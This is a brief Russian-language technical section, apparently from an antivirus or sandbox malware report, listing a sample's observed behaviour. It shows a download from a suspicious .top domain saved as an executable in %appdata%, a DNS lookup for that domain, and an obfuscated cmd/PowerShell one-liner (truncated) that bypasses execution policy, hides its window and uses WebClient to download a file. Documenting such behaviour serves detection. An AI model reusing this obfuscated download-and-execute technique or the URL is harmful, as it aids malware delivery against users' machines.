Техническая информация
- http://aoopoerope.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWER^SHEL^L^.ex^e^ -ExE^CuT^Ion^POL^iCY b^y^PA^s^s^ ^-^no^pRO^fIle^ -Win^do^WstY^le^ ^Hi^ddEN ^(n^E^w^-ObJe^cT^ S^y^stEM.nE^t.w^E^b^Cl^IEN^T^).D^oWNLo^a^dF^Ile(^'htt...
- DNS ASK ao###erope.top
- '<SYSTEM32>\cmd.exe' /C "pOWER^SHEL^L^.ex^e^ -ExE^CuT^Ion^POL^iCY b^y^PA^s^s^ ^-^no^pRO^fIle^ -Win^do^WstY^le^ ^Hi^ddEN ^(n^E^w^-ObJe^cT^ S^y^stEM.nE^t.w^E^b^Cl^IEN^T^).D^oWNLo^a^dF^Ile(^'htt... (со скрытым окном)